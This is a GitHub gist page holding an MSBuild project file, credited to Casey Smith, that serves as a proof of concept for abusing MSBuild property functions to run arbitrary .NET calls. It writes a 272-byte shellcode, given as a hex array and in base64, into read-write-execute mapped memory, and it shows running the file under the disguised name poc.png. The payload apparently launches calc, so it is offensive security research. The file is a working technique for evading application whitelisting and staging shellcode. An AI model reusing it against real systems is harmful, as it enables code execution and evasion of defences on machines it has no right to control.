Created
September 21, 2022 23:09
-
-
Save sasqwatch/54697d99f9496e6d37e922fad44bcbe8 to your computer and use it in GitHub Desktop.
Revisions
-
code-scrap revised this gist
Sep 21, 2022 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -8,7 +8,7 @@ License: BSD 3-Clause Full Working Details Here: https://www.youtube.com/watch?v=vj_rvLVpqg8 --> <!-- set MSBUILDENABLEALLPROPERTYFUNCTIONS=1 --> -
Sep 21, 2022 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,84 @@ <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > <Target Name="Hello" > <!-- Call ANY .NET API --> <!-- Author: Casey Smith, Twitter: @subTee License: BSD 3-Clause Full Working Details Here: https://www.youtube.com/watch?v=-sUXMzkh-jI --> <!-- set MSBUILDENABLEALLPROPERTYFUNCTIONS=1 --> <!-- $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe poc.png byte[] shellcode = new byte[272] { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 0x63,0x00 }; --> <!-- Debug List Assemblies <CreateItem Include="$([System.AppDomain]::CurrentDomain.GetAssemblies())" > <Output TaskParameter="Include" ItemName="TypeItems"/> </CreateItem> <Message Text="%(TypeItems.Identity)" /> --> <!-- Load Some Assemblies --> <Message Text="$([System.Reflection.Assembly]::Load('System.IO') )" /> <Message Text="$([System.Reflection.Assembly]::Load('System.IO.MemoryMappedFiles') )" /> <Message Text="$([System.Reflection.Assembly]::Load('System.Runtime.InteropServices') )" /> <PropertyGroup> <!--GUID --> <MappedFileName>1c9360ac-dc0d-4cd8-bf32-c4380855b733</MappedFileName> <Shellcode>/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=</Shellcode> <CreateMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::CreateNew($(MappedFileName), $([System.Int64]::Parse(272)),$([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)))</CreateMemoryMappedFile> <WriteToMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream().Write($([System.Convert]::FromBase64String($(Shellcode))), 0, 272) )</WriteToMemoryMappedFile> <!-- Example To Return an IntPtr --> <GetRWXIntPtrMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream( $([System.Int64]::Parse(0)), $([System.Int64]::Parse(272)), $([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)).SafeMemoryMappedViewHandle.DangerousGetHandle().ToString("X"))</GetRWXIntPtrMemoryMappedFile> </PropertyGroup> <Message Text="$(GetTypePrimitive)" /> <Message Text="$(CreateMemoryMappedFile)" /> <Message Text="$(GetRWXIntPtrMemoryMappedFile)" /> <Message Text="$([System.Console]::ReadLine())" /> </Target> </Project>
code-scrap
revised
this gist